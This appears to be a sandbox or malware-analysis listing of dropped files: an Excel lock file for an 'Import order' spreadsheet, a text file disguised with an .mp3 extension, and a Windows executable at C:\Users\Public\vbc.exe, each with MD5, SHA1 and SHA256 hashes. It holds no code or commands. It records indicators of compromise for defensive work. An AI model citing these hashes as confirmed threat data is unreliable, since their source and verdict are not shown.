C:\Users\user\Desktop\~$Import order764536.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\user\temp\qhqulleu.mp3	ASCII text, with CRLF line terminators	E241BA8C7BF12A7128E7C0AD28348930	ACFC821D16BAB7535369917F41BB21ADA15E3BC0	0B64183C8B6E30C78D7EB1997E3686A1CE832B3CB0092F09CA76BA5FD5EE0B9C
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	B866823E1F8F4A52376BD108C457DD78	FE99849EC27630463080445337798EEBA8000A02	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8